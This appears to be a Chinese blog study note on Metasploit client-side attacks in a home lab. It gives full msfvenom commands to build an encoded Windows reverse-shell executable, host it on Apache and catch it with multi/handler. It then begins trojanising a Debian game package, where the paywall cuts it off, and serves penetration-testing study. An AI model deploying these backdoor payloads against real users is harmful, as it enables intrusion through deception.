Kali linux 学习笔记(九十六)metasploit framework——客户端渗透 2020.4.28

最新推荐文章于 2025-06-26 14:01:42 发布
原创 最新推荐文章于 2025-06-26 14:01:42 发布 · 941 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #安全 #网络 #渗透

本文详细介绍了如何使用Kali Linux进行客户端渗透,包括攻击Windows和Linux系统,利用Acrobat Reader、Flash插件、IE浏览器和JRE漏洞执行payload,生成Android后门程序以及宏感染等技巧。通过社会工程学攻击,引导受害者执行payload,从而渗透网络。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

本节学习客户端渗透

  • 在无法突破网络边界的情况下转而攻击客户端,通过社会工程学攻击,进而渗透线上业务网络
  • 含有漏洞利用代码的 web 站点
  • 含有漏洞利用代码的 doc、pdf等文档
  • 诱骗被害者执行 payload

1、准备

目标机metasploitable
IP:192.168.1.120

目标机winxp
IP:192.168.1.122

目标机win7
IP:192.168.1.123

目标机ubantu
IP:192.168.1.124

攻击机kali
IP:192.168.1.121

2、攻击windows

kali

#生成payload
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe
#启动apache
service apache2 start
cp 1.exe /var/www/html/
#用msf侦听
msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload/windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit

win7浏览器打开192.168.1.121/1.exe下载并执行
kali获取win7的权限

3、攻击linux

将payload注入deb包
目标机执行deb包时反弹shell

kali

#搞个deb包
apt --download-only install freesweep
cd /var/cache/apt/archives #deb包在这个文件夹
dpkg -x freesweep_0.90-3+b1_amd64.deb free #解包
cd free/
mkdir DEBIAN
cd DEBIAN/
#创建控制文件
vi control
 Package: freesweep
 Version: 0.90-3
 Section: Games and Amusement
 Priority: optional
 Architecture:amd64
 Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)
 Description: a text-based minesweeper
 Freesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.
#创建脚本
最低0.47元/天 解锁文章

200万优质内容无限畅学
创建CA服务器的崩溃历程!!!
覃杨森的博客
02-05 327
作者:覃杨森 联系邮箱:qinyangsen991@126.com 声明:转载及使用请注明来源 关键字:CA证书服务器;SSL;windows server 2008
Kali linux 学习笔记(九十五)metasploit framework——弱点扫描 2020.4.27
闵行小鱼塘
04-27 929
本节学习用msf弱点扫描
Kali Linux运行 Metasploit Framework
u011500307的专栏
10-28 2709
运行 Metasploit Framework 依照Kali Linux网络服务策略,Kali没有自动启动的网络服务,包括数据库服务在内.所以为了让Metasploit以支持数据库的方式运行有些必要的步骤. 启动Kali的PostgreSQL服务 Metasploit 使用PostgreSQL作为数据库,所以必须先运行它. service postgresql start
kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
logic1001的博客
06-26 756
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
kali-linux-2020.4最新官网版网pan
weixin_40962826的博客
12-13 900
#kali-linux-2020.4 链接: https://pan.baidu.com/s/1XGsqnI1_TmX2tm9MqtfJfg 提取码: bn76
Kali常见攻击手段_kali攻击
weixin_51725318的博客
12-27 3501
Kali常见攻击手段
渗透测试-MSF工具使用简介及命令使用漏洞利用过程
XLbb的博客
05-08 6191
1.MSF工具使用简介及命令使用(kali系统) 1.1什么是MSF: Metasploit就是一个漏洞框架,是一个免费、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数2000多个已知软件漏洞的专业级漏洞攻击工具。 步骤一:在kali系统中运行msf软件 :msfconsole; 如:测试编号为cve-2019-0708 的漏洞(windows7漏洞); 根据漏洞编号,用search查找相应的漏洞攻击工具。
Kali linux 学习笔记(九十四)metasploit framework——信息收集 2020.4.26
闵行小鱼塘
04-27 643
本节学习用msf信息收集,手段非常丰富
Kali linux 学习笔记(九十一)metasploit framework——exploit模块 2020.4.24
闵行小鱼塘
04-27 718
本节学习exploit模块
Kali linux 学习笔记(八十九)metasploit framework——简介 2020.4.23
闵行小鱼塘
04-23 1231
本节开始学习msf相关知识
渗透工具——kali中msf(后门生成模块msfvenom)
2301_78006725的博客
09-02 1010
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell。
DOM - 学习笔记
08-05
JavaScript是在浏览器中运行的,如果它只限于加减乘除运算,而不能将运算结果实现在浏览器中,或者不能与用户进行交互操作,那么它就失去了存在的意义.
记录一次体验kali渗透工具MSF以及msfconsole命令详解
ch_ycc的博客
04-22 6794
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
网络安全kali web安全 Kali之msf简单的漏洞利用
热门推荐
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
kali利用msf渗透Windows电脑测试
2403_90011488的博客
03-28 1202
MSF集成了数千个已知的软件漏洞利用模块,支持针对不同平台(如Windows、Linux)和服务(如SMB)的漏洞攻击。例如,著名的永恒之蓝漏洞 (MS17_010)就是通过MSF进行利用的。
kali-简单渗透笔记
weixin_30750335的博客
01-12 2703
端口扫描 nmap -sS 目标ipArp 内网断网Arpspoof -i 网卡 -t 目标ip 网关获取网卡/网关ifconfig获取内网ipfping -asg 192.168.1.0/24Arp 欺骗echo 写命令,是不会有回显的ehco 1 >proc/sys/net/ipv4/ip_forward# 进行IP流量转发目标 --》 我的网卡 --》网关driftnet --&gt...
kali下什么版本的flash_Kali安装Flash Player()()
weixin_30747255的博客
01-17 340
Step 1: Downloading Flash for Kali LinuxFirst of all go to this site and download tar.gz for other linux .https://get.adobe.com/flashplayer/Step 2: Extract the tar.gz Fileonce you have downloaded the ...
kali下arp欺骗session会话劫持
赵一舟的博客
02-08 4359
基于arp欺骗的session劫持 开启ettercap arp监听后 开启打开一个终端,输入driftnet -i wlan0 测试下arp欺骗正常没 TcpDump可以将网络中传送的数据包完全截获下来提供分析 捕获数据包命令,重新开启命令行 tcpdump -i wlan0 -w text1.cap 让受害者打开个邮箱或者微博等,登陆成功后停止tcpdump,然后在
kali Linux生成Windows后门
webkm的博客
04-24 1047
教程开始: Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块 msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值